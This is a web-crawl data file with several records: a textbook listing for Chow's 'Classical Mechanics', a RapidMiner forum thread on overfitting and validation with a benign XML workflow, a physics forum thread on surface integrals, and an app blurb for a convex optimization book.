[ "Math shortcuts, Articles, worksheets, Exam tips, Question, Answers, FSc, BSc, MSc\n\n#### Keep Connect with Us\n\n• =", null, "", null, "JOIN OUR 33,890 + FANS", null, "JOIN OUR 100 + FANS\n\nMathSchool Search Box\n• Welcome in Math School.\n• This is beta verion of our website.\n\nclassical mechanics 2nd edition, tai l chow [pdf] MathSchool\n\n### Classical Mechanics Second Edition By Tai L. Chow\n\nMathSchoolinternational contain thousands of Mathematics Free Books and Physics Free Books. Which cover almost all topics for students of Mathematics, Physics and Engineering. We have also collected other Best Free Math Websites", null, "for teachers and students.\nHere is extisive list of Best Classical Mechanics Books . We hope person who’s interested in Physics like these books.", null, "Classical Mechanics, 2E written by Tai Chow .\nThis book presents a reasonably complete account of the theoretical mechanics of particles and systems for physics students at the advanced undergraduate level. It is evolved from a set of lecture notes for a course on the subject, which I have taught at California State University, Stanislaus, for many years. We presume that the student has been exposed to a calculus-based general physics course (from a textbook such as that by Halliday and Resnick) and a course in calculus (including the handling of differentiations of field functions). No prior knowledge of differential equations is required. Differential equations and new mathematical methods are developed in the text as the occasion demands. Vectors are used from the start.\nThe book has 17 chapters, and with appropriate omission, the essential topics can be covered in a one-semester, four-hour course. We do not make any specific suggestions for a shorter course. We usually vary the topics to suit the ability and mathematical background of the students. We would encourage the more enthusiastic and able students to attempt to master on their own the material not covered in class (for extra credit). A major departure of this book from the conventional approach is the introduction of the Lagrangian and Hamiltonian formulations of mechanics at an early stage. In the conventional approach to the subject, Lagrangian and Hamiltonian formulations are presented near the end of the course, and students rarely develop a reasonable familiarity with these essential methods.\n\nBook Detail :-\nTitle: Classical Mechanics\nEdition: Second Edition\nAuthor(s): Tai L. Chow\nPublisher:\nSeries:\nYear:\nPages: 631\nType: PDF\nLanguage: English\nISBN: 978-1-4665-7000-9\nCountry: US\n\nAbout Author :- The author Tai L. Chow, California State University Stanislaus, Turlock, CA, USA.\n\nMath Formulas's Top Books:-\nMath Formulas's Top Books recommended for you.\n1300 Math Formulas by Alex-Svirin Ph.D.\nSchaum Mathematical Handbook Formulas Tables (5E)\nCRC Standard Mathematical Tables, Formulas (33E) By Daniel Zwillinger\n\nBook Contents :-\nClassical Mechanics, 2E written by Tai Chow cover the following topics. '\n1. Kinematics: Describing the Motion\n2. Newtonian Mechanics\n3. Integration of Newton’s Equation of Motion\n4. Lagrangian Formulation of Mechanics: Descriptions of Motion in Configuration Space\n5. Hamiltonian Formulation of Mechanics: Descriptions of Motion in Phase Spaces\n6. Motion Under a Central Force\n7. Harmonic Oscillator\n8. Coupled Oscillations and Normal Coordinates\n9. Nonlinear Oscillations\n10. Collisions and Scatterings\n11. Motion in Non-Inertial Systems\n12. Motion of Rigid Bodies\n13. Theory of Special Relativity\n14. Newtonian Gravity and Newtonian Cosmology\n15. Hamilton–Jacobi Theory of Dynamics\n16. Introduction to Lagrangian and Hamiltonian Formulations for Continuous Systems and Classical Fields\nAppendix-1 Vector Analysis and Ordinary Differential Equations\nAppendix-2 D’Alembert’s Principle and Lagrange’s Equations\nAppendix-3 Derivation of Hamilton’s Principle from D’Alembert’s Principle\nAppendix-4 Noether’s Theorem.\nAppendix-5 Conic Sections, Ellipse, Parabola, and Hyperbola.\n\nNote:-\n\nWe are not the owner of this book/notes. We provide it which is already avialable on the internet. For any further querries please contact us. We never SUPPORT PIRACY. This copy was provided for students who are financially troubled but want studeing to learn. If You Think This Materials Is Useful, Please get it legally from the PUBLISHERS. Thank you.\n\n?1\n\n?2\n\n##### SHORTCUT TRICKS (Division)\n• Divisible by 2 Shortcut trick\n• Divisible by 3 Shortcut trick\n• Divisible by 4 Shortcut trick\n• Divisible by 5 Shortcut trick\n• Divisible by 6 Shortcut trick", null, "• Divisible by 7 Shortcut trick", null, "• Divisible by 8 Shortcut trick", null, "• Divisible by 9 Shortcut trick\n• Divisible by 10 Shortcut trick\n\n##### Worksheets (Solved)\n\n###### Integration", null, "", null, "", null, "", null, "", null, "" ]
[ null, "https://mathschoolinternational.com/images/logoMedium.gif", null, "https://mathschoolinternational.com/Images/FaceBooklogo.jpg", null, "https://mathschoolinternational.com/Images/Twitterlogo.jpg", null, "https://mathschoolinternational.com/Images/New.gif", null, "https://mathschoolinternational.com/Physics-Books/Mechanics/Books/Classical-Mechanics-2E--Tai-Chow.jpg", null, "https://mathschoolinternational.com/Images/New.gif", null, "https://mathschoolinternational.com/Images/New.gif", null, "https://mathschoolinternational.com/Images/New.gif", null, "https://mathschoolinternational.com/Images/New.gif", null, "https://mathschoolinternational.com/images/advertise-here2.jpg", null, "https://mathschoolinternational.com/images/ExamTips.png", null, "https://mathschoolinternational.com/images\\100Marks.jpg", null, "https://mathschoolinternational.com/Physics-Books/Mechanics/..\\..\\images\\Times-of-India-Education-Display-Ads.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88665557,"math_prob":0.58512664,"size":4076,"snap":"2023-40-2023-50","text_gpt3_token_len":891,"char_repetition_ratio":0.10756385,"word_repetition_ratio":0.02310231,"special_character_ratio":0.19676153,"punctuation_ratio":0.13835616,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.95085293,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-01T13:45:35Z\",\"WARC-Record-ID\":\"<urn:uuid:416e6ba7-1cb6-44bc-a34e-91ab841b6733>\",\"Content-Length\":\"71155\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e2a98a6b-27cb-4aa3-83a6-2849e0fa5aaf>\",\"WARC-Concurrent-To\":\"<urn:uuid:b54b2590-de86-4382-919c-b7e6bf914cc8>\",\"WARC-IP-Address\":\"65.108.97.18\",\"WARC-Target-URI\":\"https://mathschoolinternational.com/Physics-Books/Mechanics/Classical-Mechanics-2E--Tai-Chow.aspx\",\"WARC-Payload-Digest\":\"sha1:BD5HUORFXNB3OKB3RYCRTHH3XE55NHOU\",\"WARC-Block-Digest\":\"sha1:AJE6WGHUVBU3SDTKB5O3PPZOC4ZMPLN3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100287.49_warc_CC-MAIN-20231201120231-20231201150231-00872.warc.gz\"}"}
https://community.rapidminer.com/discussion/14911/relative-overfitting-rate
[ "# Relative Overfitting Rate\n\nMember Posts: 19", null, "Maven\nHi there,\n\nI have a question regarding the calculation of the \"relative overfitting rate\". Background is the comparison of different parameter settings and their overfitting behavior respectively.\n\nThe relative overfitting rate was proposed in:\nEfron, B.; Tibshirani, R.: Improvements on Cross-Validation: The .632+ Bootstrap Method. Journal of the American Statistical Association. (1997), Nr. 92, S. 548–560.\n\nIn this paper the .632 Bootstrap Method is enhaced by some sort of weighting mechanism, which is irrelevant for this post. Anyway, the relevant question regards the formula for the relative overfitting rate which is defined in formula 28 (see below). R being the relative overfitting rate, Êrr1 being the Bootstrap-Leave-one-out Error and err being the \"emprical error\" (Formula 7). Formula 27 shows the calculation of gamma for a binary classificator.", null, "Now here is the question:\n\nCan anyone please explain the me how I can adapt this concept for a regression problem? I have a dataset of 30 Attributes and about 300 examples for which I create a prediction for a label (range 0,01 to 0,1). I have trouble understanding the mathematics behind it.. and the writing. I can retrieve the Êrr1 from the bootstrap operator of RM, but how do I calculate the rest?\n\nAny help greatly appreciated..\nBest regards\n\n• Member Posts: 537", null, "Guru\nDear Tek,\n\nFirst you should measure the variability in your cross validation estimates.\n\nBest regards,\n\nWessel\n• Member Posts: 19", null, "Maven\nHi there,\n\nthanks for the reply. How do I measure the variability?\n\nBesides, I found some new information. I now understand that err, is the generalization error (Test and Training set are equal). And, that for an information about the overfitting I need some sort of \"number\" to describe the maximal overfitting (here it is gamma, or the \"no information error\"). Gamma is described as \"the averaged permutation of all possible labels with all possible predictors\".\n\nBut still, two questions remain:\n\n1. How the hell do I actually calculate gamma?\n2. For regression, do I have to replace the error function with RMS? (which actually would make sense in a certain way)\n\nBest regards\n• Member Posts: 537", null, "Guru\nHey,\n\nThis is part of my own unpublished research, so I don't want to give every detail.\n\nOne way to calculate the variance in the error of estimate is as follows:\nSplit the data in two parts.\nRun cross validation on the first part to obtain a performance estimate.\nApply the mode (trained on the first part of the data) to the second part of the data and obtain the real performance.\nCalculate the difference (error) between real performance and the performance estimate.\nRepeat this procedure for many different data splits.\n\nSo basically this is a way to validate the validation procedure.\nTheory states that cross validation is an unbiased estimate.\nSo you expect the attribute \"esti-real\" to have a mean close to zero.\nFor the synthetic data set I used it was 4.0, so rather close to zero.\nAfter you compute the variance: \"(esti-real)^2\": 1080.5, you realize the variance is rather high.\nSo theory states there is room for improvement.\n\nOne way to reduce the variance is to use a different value of k, in k-fold cross validation.\nBut recent developments suggest that its better to use multiple values of k, or combine cross validation with bootstrapping validation.\n\nreal             avg = 79.3372 +/- 19.6535 [33.9304 ; 129.2291]\nprediction(real) avg = 79.3372 +/- 5.4302 [66.9098 ; 88.8779]\nesti             avg = 83.3311 +/- 21.3748 [45.7766 ; 132.2486]\nesti-real       avg = 3.9939 +/- 32.7915 [-66.4296 ; 93.7430]\n(esti-real)^2     avg = 1080.4833 +/- 1364.4548 [0.0276 ; 8787.7420]\n(see figure below)", null, "• Member Posts: 537", null, "Guru\n<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\n<process version=\"5.1.008\">\n<context>\n<input/>\n<output/>\n<macros/>\n</context>\n<operator activated=\"true\" class=\"process\" compatibility=\"5.1.008\" expanded=\"true\" name=\"Process\">\n<process expanded=\"true\" height=\"391\" width=\"701\">\n<operator activated=\"true\" class=\"retrieve\" compatibility=\"5.1.008\" expanded=\"true\" height=\"60\" name=\"Retrieve\" width=\"90\" x=\"45\" y=\"30\">\n<parameter key=\"repository_entry\" value=\"//Samples/data/Polynomial\"/>\n</operator>\n<operator activated=\"true\" class=\"loop\" compatibility=\"5.1.008\" expanded=\"true\" height=\"94\" name=\"Loop Procedure\" width=\"90\" x=\"179\" y=\"30\">\n<parameter key=\"iterations\" value=\"100\"/>\n<process expanded=\"true\" height=\"409\" width=\"705\">\n<operator activated=\"true\" class=\"split_data\" compatibility=\"5.1.008\" expanded=\"true\" height=\"94\" name=\"Split Outer\" width=\"90\" x=\"45\" y=\"165\">\n<enumeration key=\"partitions\">\n<parameter key=\"ratio\" value=\"0.9\"/>\n<parameter key=\"ratio\" value=\"0.1\"/>\n</enumeration>\n<parameter key=\"sampling_type\" value=\"stratified sampling\"/>\n</operator>\n<operator activated=\"true\" class=\"x_validation\" compatibility=\"5.1.008\" expanded=\"true\" height=\"112\" name=\"Validation\" width=\"90\" x=\"180\" y=\"30\">\n<parameter key=\"sampling_type\" value=\"shuffled sampling\"/>\n<process expanded=\"true\" height=\"409\" width=\"299\">\n<operator activated=\"true\" class=\"linear_regression\" compatibility=\"5.1.008\" expanded=\"true\" height=\"94\" name=\"Linear Regression (2)\" width=\"90\" x=\"112\" y=\"30\"/>\n<connect from_port=\"training\" to_op=\"Linear Regression (2)\" to_port=\"training set\"/>\n<connect from_op=\"Linear Regression (2)\" from_port=\"model\" to_port=\"model\"/>\n<portSpacing port=\"source_training\" spacing=\"0\"/>\n<portSpacing port=\"sink_model\" spacing=\"0\"/>\n<portSpacing port=\"sink_through 1\" spacing=\"0\"/>\n</process>\n<process expanded=\"true\" height=\"409\" width=\"346\">\n<operator activated=\"true\" class=\"apply_model\" compatibility=\"5.1.008\" expanded=\"true\" height=\"76\" name=\"Apply Inner\" width=\"90\" x=\"45\" y=\"30\">\n<list key=\"application_parameters\"/>\n</operator>\n<operator activated=\"true\" class=\"performance\" compatibility=\"5.1.008\" expanded=\"true\" height=\"76\" name=\"Perf Inner\" width=\"90\" x=\"246\" y=\"30\"/>\n<connect from_port=\"model\" to_op=\"Apply Inner\" to_port=\"model\"/>\n<connect from_port=\"test set\" to_op=\"Apply Inner\" to_port=\"unlabelled data\"/>\n<connect from_op=\"Apply Inner\" from_port=\"labelled data\" to_op=\"Perf Inner\" to_port=\"labelled data\"/>\n<connect from_op=\"Perf Inner\" from_port=\"performance\" to_port=\"averagable 1\"/>\n<portSpacing port=\"source_model\" spacing=\"0\"/>\n<portSpacing port=\"source_test set\" spacing=\"0\"/>\n<portSpacing port=\"source_through 1\" spacing=\"0\"/>\n<portSpacing port=\"sink_averagable 1\" spacing=\"0\"/>\n<portSpacing port=\"sink_averagable 2\" spacing=\"0\"/>\n</process>\n</operator>\n<operator activated=\"true\" class=\"apply_model\" compatibility=\"5.1.008\" expanded=\"true\" height=\"76\" name=\"Apply Outer\" width=\"90\" x=\"313\" y=\"165\">\n<list key=\"application_parameters\"/>\n</operator>\n<operator activated=\"true\" class=\"performance\" compatibility=\"5.1.008\" expanded=\"true\" height=\"76\" name=\"Perf Outer\" width=\"90\" x=\"447\" y=\"120\"/>\n<operator activated=\"true\" class=\"log\" compatibility=\"5.1.008\" expanded=\"true\" height=\"94\" name=\"Log\" width=\"90\" x=\"585\" y=\"30\">\n<list key=\"log\">\n<parameter key=\"estimate\" value=\"operator.Perf Inner.value.performance\"/>\n<parameter key=\"real\" value=\"operator.Perf Outer.value.performance\"/>\n<parameter key=\"iteration\" value=\"operator.Loop Procedure.value.iteration\"/>\n</list>\n</operator>\n<connect from_port=\"input 1\" to_op=\"Split Outer\" to_port=\"example set\"/>\n<connect from_op=\"Split Outer\" from_port=\"partition 1\" to_op=\"Validation\" to_port=\"training\"/>\n<connect from_op=\"Split Outer\" from_port=\"partition 2\" to_op=\"Apply Outer\" to_port=\"unlabelled data\"/>\n<connect from_op=\"Validation\" from_port=\"model\" to_op=\"Apply Outer\" to_port=\"model\"/>\n<connect from_op=\"Apply Outer\" from_port=\"labelled data\" to_op=\"Perf Outer\" to_port=\"labelled data\"/>\n<connect from_op=\"Perf Outer\" from_port=\"performance\" to_op=\"Log\" to_port=\"through 1\"/>\n<connect from_op=\"Log\" from_port=\"through 2\" to_port=\"output 2\"/>\n<portSpacing port=\"source_input 1\" spacing=\"90\"/>\n<portSpacing port=\"source_input 2\" spacing=\"0\"/>\n<portSpacing port=\"sink_output 1\" spacing=\"0\"/>\n<portSpacing port=\"sink_output 2\" spacing=\"0\"/>\n<portSpacing port=\"sink_output 3\" spacing=\"0\"/>\n</process>\n</operator>\n<operator activated=\"true\" class=\"log_to_data\" compatibility=\"5.1.008\" expanded=\"true\" height=\"94\" name=\"Log to Data\" width=\"90\" x=\"313\" y=\"30\">\n<parameter key=\"log_name\" value=\"Log\"/>\n</operator>\n<operator activated=\"true\" class=\"store\" compatibility=\"5.1.008\" expanded=\"true\" height=\"60\" name=\"Store\" width=\"90\" x=\"447\" y=\"30\">\n<parameter key=\"repository_entry\" value=\"X\"/>\n</operator>\n<operator activated=\"true\" class=\"retrieve\" compatibility=\"5.1.008\" expanded=\"true\" height=\"60\" name=\"Result\" width=\"90\" x=\"45\" y=\"165\">\n<parameter key=\"repository_entry\" value=\"X\"/>\n</operator>\n<operator activated=\"true\" class=\"set_role\" compatibility=\"5.1.008\" expanded=\"true\" height=\"76\" name=\"label: real\" width=\"90\" x=\"179\" y=\"165\">\n<parameter key=\"name\" value=\"real\"/>\n<parameter key=\"target_role\" value=\"label\"/>\n</operator>\n<operator activated=\"true\" class=\"select_attributes\" compatibility=\"5.1.008\" expanded=\"true\" height=\"76\" name=\"input: estimate\" width=\"90\" x=\"313\" y=\"165\">\n<parameter key=\"attribute_filter_type\" value=\"single\"/>\n<parameter key=\"attribute\" value=\"estimate\"/>\n</operator>\n<operator activated=\"true\" class=\"linear_regression\" compatibility=\"5.1.008\" expanded=\"true\" height=\"94\" name=\"Linear Regression\" width=\"90\" x=\"447\" y=\"165\"/>\n<operator activated=\"true\" class=\"apply_model\" compatibility=\"5.1.008\" expanded=\"true\" height=\"76\" name=\"Apply Model\" width=\"90\" x=\"581\" y=\"165\">\n<list key=\"application_parameters\"/>\n</operator>\n<operator activated=\"true\" class=\"generate_attributes\" compatibility=\"5.1.008\" expanded=\"true\" height=\"76\" name=\"Generate Attributes\" width=\"90\" x=\"581\" y=\"255\">\n<list key=\"function_descriptions\">\n<parameter key=\"estimate-real\" value=\"estimate-real\"/>\n<parameter key=\"abs(estimate-real)\" value=\"abs(estimate-real)\"/>\n</list>\n</operator>\n<connect from_op=\"Retrieve\" from_port=\"output\" to_op=\"Loop Procedure\" to_port=\"input 1\"/>\n<connect from_op=\"Loop Procedure\" from_port=\"output 1\" to_op=\"Log to Data\" to_port=\"through 1\"/>\n<connect from_op=\"Log to Data\" from_port=\"exampleSet\" to_op=\"Store\" to_port=\"input\"/>\n<connect from_op=\"Store\" from_port=\"through\" to_port=\"result 1\"/>\n<connect from_op=\"Result\" from_port=\"output\" to_op=\"label: real\" to_port=\"example set input\"/>\n<connect from_op=\"label: real\" from_port=\"example set output\" to_op=\"input: estimate\" to_port=\"example set input\"/>\n<connect from_op=\"input: estimate\" from_port=\"example set output\" to_op=\"Linear Regression\" to_port=\"training set\"/>\n<connect from_op=\"Linear Regression\" from_port=\"model\" to_op=\"Apply Model\" to_port=\"model\"/>\n<connect from_op=\"Linear Regression\" from_port=\"exampleSet\" to_op=\"Apply Model\" to_port=\"unlabelled data\"/>\n<connect from_op=\"Apply Model\" from_port=\"labelled data\" to_op=\"Generate Attributes\" to_port=\"example set input\"/>\n<connect from_op=\"Apply Model\" from_port=\"model\" to_port=\"result 2\"/>\n<connect from_op=\"Generate Attributes\" from_port=\"example set output\" to_port=\"result 3\"/>\n<portSpacing port=\"source_input 1\" spacing=\"0\"/>\n<portSpacing port=\"sink_result 1\" spacing=\"0\"/>\n<portSpacing port=\"sink_result 2\" spacing=\"126\"/>\n<portSpacing port=\"sink_result 3\" spacing=\"54\"/>\n<portSpacing port=\"sink_result 4\" spacing=\"0\"/>\n</process>\n</operator>\n</process>\n\n• Member Posts: 19", null, "Maven\nHi,\n\nthats an interesting process. I did some further research on the overfitting subject, though. In regard to your process, is it possible to feed the ANOVA (performance) operator the real true values of the dataset? So i.e.:\n\nInput 1 is the performance vector (or rather the predictions) of the trained model\nInput 2 are the real (true) label values of the original data set\n\nIf thats not possible, I would have to find a way to let me output the predictions and calculate the ANOVA (R² respectively) in excel.\n\nThanks again!\n• Member Posts: 537", null, "Guru\nHey,\n\nI'm not sure I understand the question.\nThe R squared is a measure used when training and testing on the same data.\nThere is also corrected R squared, which corrects for the number of parameters.\n\nYou can calculate the R squared using the Linear Regression operator (I think).\nAlso using the T-Test operator or ANOVA operator (I think).\nBut I never used this, because this measure is ill suited because for a lot of learners the number of parameters is an ill defined concept.\n\nBest regards,\n\nWessel\n• Member Posts: 19", null, "Maven\nHey,\n\nlet try to me clarify that:\n\nR² is defined as the fraction of \"variance explained through regression\" / \"total variance\", or alternatively: 1 - \"variance not explained by regression\" / \"total variance\". In the ANOVA chart this would be equivalent to \"in between\" / \"total\", or 1 - \"residual\" / \"total\" respectively.\n\nFurthermore, in regression, R² is an indicator for \"how well a function fits its underlying data\". Thus, a R² close to 1 CAN already be a first indicator for overfitting, because all of the variance is explained through the regression model (but certainly, this is not the holy grail, because it might very well be, that the trainined model just fits the data well). In the next step, one can compare the change of R² between training phase and test phase (here I mean by test phase  using the holdout method, using new unseen data) and the change of error, too.\n\nNow, my idea is that: if R² shrinks from training to testing phase (again, by \"testing phase\" I dont mean the X-Validation testing phase, but rather the actual test on unseen data), one can assume overfitting for the training data. A second indicator would be that error increases from training to testing.\n\nThis is due to the definition of R²: if overfitting occured, then unseen data is predicted uncorrectly, then the \"variance explained through regression\" will shrink, while the \"total variance\" might not change at all, thus resulting in R² to shrink. On the other hand, the error on unseen data should increase in regard to the error of trained data (which is overfitted, and thus very small).\n\nCombining these two, maybe one can make assumptions about overfitting?\n\nThanks for further help! Maybe I am completly wrong with my assumptions here. ; )\n\nPS: You mentioned R² is only used if training and test data are the same. Wouldnt it be more correct that R² can only be used if the mean of training and testing data are the same?\n\nPSPS: Another idea, if you compare the residuals (lets say in a histogram), from training to testing phase, the histogram should change its shape from a pyramid shaped form to a more U-shaped form? (rephrased: the overfitted model cannot predict the unseen data correctly, thus the amount of bigger residuals will increase)" ]
[ null, "https://s3.amazonaws.com/rapidminer.community/vanilla-rank-images/maven-16x16.png ", null, "http://i55.tinypic.com/rtn4va.jpg", null, "https://s3.amazonaws.com/rapidminer.community/vanilla-rank-images/guru-16x16.png ", null, "https://s3.amazonaws.com/rapidminer.community/vanilla-rank-images/maven-16x16.png ", null, "https://s3.amazonaws.com/rapidminer.community/vanilla-rank-images/guru-16x16.png ", null, "http://s1.postimage.org/5tckg4owo/real_estimate.png", null, "https://s3.amazonaws.com/rapidminer.community/vanilla-rank-images/guru-16x16.png ", null, "https://s3.amazonaws.com/rapidminer.community/vanilla-rank-images/maven-16x16.png ", null, "https://s3.amazonaws.com/rapidminer.community/vanilla-rank-images/guru-16x16.png ", null, "https://s3.amazonaws.com/rapidminer.community/vanilla-rank-images/maven-16x16.png ", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6569487,"math_prob":0.7353522,"size":15714,"snap":"2022-40-2023-06","text_gpt3_token_len":3991,"char_repetition_ratio":0.14735837,"word_repetition_ratio":0.22961038,"special_character_ratio":0.28452337,"punctuation_ratio":0.103264995,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9973933,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,null,null,6,null,null,null,null,null,null,null,6,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-07T09:13:55Z\",\"WARC-Record-ID\":\"<urn:uuid:7c4924b8-d67c-4437-ae8f-05430faf01bf>\",\"Content-Length\":\"93606\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0f595990-bc6f-4729-9cc7-dcce0a981b37>\",\"WARC-Concurrent-To\":\"<urn:uuid:35ae61e3-dee3-42fe-bd5c-c200481ff338>\",\"WARC-IP-Address\":\"162.159.138.78\",\"WARC-Target-URI\":\"https://community.rapidminer.com/discussion/14911/relative-overfitting-rate\",\"WARC-Payload-Digest\":\"sha1:5LRHSB6V7J2A72VHZYDTWHMOCRSU73KY\",\"WARC-Block-Digest\":\"sha1:GKNTDWS3FDD42JHDUY6UW6RDGEDUC5IO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500392.45_warc_CC-MAIN-20230207071302-20230207101302-00711.warc.gz\"}"}
https://www.physicsforums.com/threads/finding-surface-area-using-double-integrals.553275/
[ "# Finding surface area using double integrals\n\n## Homework Statement\n\nThe portion of the paraboloid 2z=x^2+y^2 that is inside the cylinder x^2+y^2=8\n\n## The Attempt at a Solution\n\nmy attempt was that i would turn this into polar coordinates and solve that integral but is it right? I came up with\n\nRelated Calculus and Beyond Homework Help News on Phys.org\nSimon Bridge\nHomework Helper\nLCKurtz\nHomework Helper\nGold Member\n\n## Homework Statement\n\nThe portion of the paraboloid 2z=x^2+y^2 that is inside the cylinder x^2+y^2=8\n\n## The Attempt at a Solution\n\nmy attempt was that i would turn this into polar coordinates and solve that integral but is it right? I came up with\nThat integral isn't correct. Show us how you calculated dS.\n\nwoops my limits arent right on that, it should go from 0 to sqrt(8). is that what is wrong?\n\nLCKurtz\nHomework Helper\nGold Member\nThat integral isn't correct. Show us how you calculated dS.\nwoops my limits arent right on that, it should go from 0 to sqrt(8). is that what is wrong?\nThat's one thing.\n\nwell i know that a cylinder makes the dr integral go from 0 to sqrt(8), and I know for dθ it goes all the way around so i know thats from 0 to 2pi, and for my integral i just did (x^2+y^2)/2 and then converted that to polar so it would be r^2/2 and then wrote out the complete equation ie\n\nLCKurtz\nHomework Helper\nGold Member\nwell i know that a cylinder makes the dr integral go from 0 to sqrt(8), and I know for dθ it goes all the way around so i know thats from 0 to 2pi, and for my integral i just did (x^2+y^2)/2 and then converted that to polar so it would be r^2/2 and then wrote out the complete equation ie\nThat would be right if you were asked to calculate the volume under the paraboloid and above the xy plane. But the title of your thread says you are asked to get the surface area of the paraboloid inside the cylinder. That is why I keep asking you for dS.\n\nHallsofIvy\nHomework Helper\nAny surface can be written as a vector equation:\n$$\\vec{r}(u,v)= x(u,v)\\vec{i}+ y(u,v)\\vec{j}+ z(u,v)\\vec{k}$$\nwhere u and v are parameters.\n\nThe vectors\n$$\\vec{r}_u(u,v)= x_u\\vec{i}+ y_u\\vec{j}+ z_u\\vec{k}$$\nand\n$$\\vec{r}_v(u,v)= x_v\\vec{i}+ y_v\\vec{j}+ z_v\\vec{k}$$\n\nare tangent vectors. Their cross product gives the \"differential of surface area\":\n$$dS= \\left|\\vec{r}_u\\times \\vec{r}_v\\right|du dv$$\n\nwow im an idiot. so the equation i found was\nsa=double integral of the sqrt((fx)^2 + (fy)^2 +1)\n\nso this was my equation\nhttp://gyazo.com/a90a63c1d98779233c0a246864823cd4\nwith the respective integrals of course. is that right?\nand If it is, i know i have to convert it to polar, which looks terribly difficult\n\nLast edited:\nSimon Bridge\nHomework Helper\nI gave you a link which shows you how to work out the integrand and do the conversion.\nYou have to scroll down to the bit where it shows you the example related to your problem.\nI suspect you are still thinking in terms of integrating some function provided. Get that out of your head - the dS takes care of that for you. (Either that or you forgot to do the cross product...)\n\nThe thinking:\nIn general - when you have a flat area to calculate, you stamp the area with small squares and count them. dS is that small area. If the rea is flat then the sides of the small squares are dx and dy then the surface area of each is dS=dxdy. The Area of the whole surface is the sum of all the little areas like this:\n\n$$\\int_{Y} \\int_{X} dxdy$$ ... where X and Y represent the limits of integration.\nNotice how there is apprently no function to integrate? The function in question is g(x,y)=1 - because the surface is flat, it's slope in the x and y directions is 1.\n\nThe area below a function in the x-y plane is a special case of this that simplifies to a single integral - so it is easier to teach.\nAs a double integral, the area under f(x) is:\n\n$$\\int_{a}^{b} \\int_{y=0}^{y=f(x)} 1dydx$$\n\nIf the area is not flat, then you project the squares onto the surface - so they look like parallelograms - the sides will be longer depending on the slope of the surface in their directions (hint: partial derivatives) and dS will be in terms of dxdy but modified for the area of a parallelogram. Which is basically what you've just done.\n\nBut you can also do this in other coordinate systems.\n\nIn polar coords, a small area at position $(r,\\theta)$ from the z axis, in a plane perpendicular to the z axis, which covers a distance $\\Delta r$ in the $r$ direction, and an angle $\\Delta \\phi$ in the $\\phi$ would be roughly $dS=(r\\Delta \\phi) \\Delta r$ - can you see why? In the limit that $\\Delta \\phi$ and $\\Delta r$ are very small, then this area is exact with:\n\n$$dS = r dr d\\phi$$\n\nBUT: the surface is not flat!\nA parabaloid about z in cylindrical-polar coords would be:\n\n$z=a(r+b)^2$\n\nSo the slope varies in the r direction - making the sides of dS longer in the r direction.\nA quick sketch of the situation will help.\n\n(BTW: You'll have noticed how useful LaTeX is by now - it is really worth learning.)\n\nLast edited:" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9217684,"math_prob":0.99436283,"size":310,"snap":"2020-10-2020-16","text_gpt3_token_len":105,"char_repetition_ratio":0.10784314,"word_repetition_ratio":0.0,"special_character_ratio":0.32258064,"punctuation_ratio":0.05,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9996018,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-03T01:29:58Z\",\"WARC-Record-ID\":\"<urn:uuid:d9f749dd-ff70-4fde-8e7a-f3ed5035ca99>\",\"Content-Length\":\"105830\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cc07c338-f47a-400f-857d-403d039f59ef>\",\"WARC-Concurrent-To\":\"<urn:uuid:79ef46e4-9d2e-417d-863a-7ab04e271089>\",\"WARC-IP-Address\":\"23.111.143.85\",\"WARC-Target-URI\":\"https://www.physicsforums.com/threads/finding-surface-area-using-double-integrals.553275/\",\"WARC-Payload-Digest\":\"sha1:DMOBYBZ7LH243Q4JHAN4ZEGIQ3BLZTY7\",\"WARC-Block-Digest\":\"sha1:M35QHC42XFRK4FMDBY7FUI2CYQ7LOM2V\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585370509103.51_warc_CC-MAIN-20200402235814-20200403025814-00548.warc.gz\"}"}
https://www.booksfree.mobi/2018/06/learn-convex-optimization-full.html
[ "Free book apps for Android\n\n# Learn Convex Optimization Full\n\nConvex Optimization Tutorial", null, "Learn Convex Optimization Full\n\nThis Learn Convex Optimization Full will introduce various concepts involved in non-linear optimization. Linear programming problems are very easy to solve but most of the real world applications involve non-linear boundaries. So, the scope of linear programming is very limited. Hence, it is an attempt to introduce the topics like convex functions and sets and its variants, which can be used to solve the most of the worldly problems.\n\nThis Learn Convex Optimization Full is suited for the students who are interested in solving various optimization problems. These concepts are widely used in bioengineering, electrical engineering, machine learning, statistics, economics, finance, scientific computing and computational mathematics and many more.\n\nThe prerequisites for this course is introduction to linear algebra like introduction to the concepts like matrices, eigenvectors, symmetric matrices; basic calculus and introduction to the optimization like introduction to the concepts of linear programming.", null, "", null, "", null, "Characteristics of the Learn Convex Optimization Full:\n+ Free Book Apps.\n+ Easy to use.\n+ Have a list of related applications.\n+ Easily view the history of viewed items.\n+ Easily share with friends through all 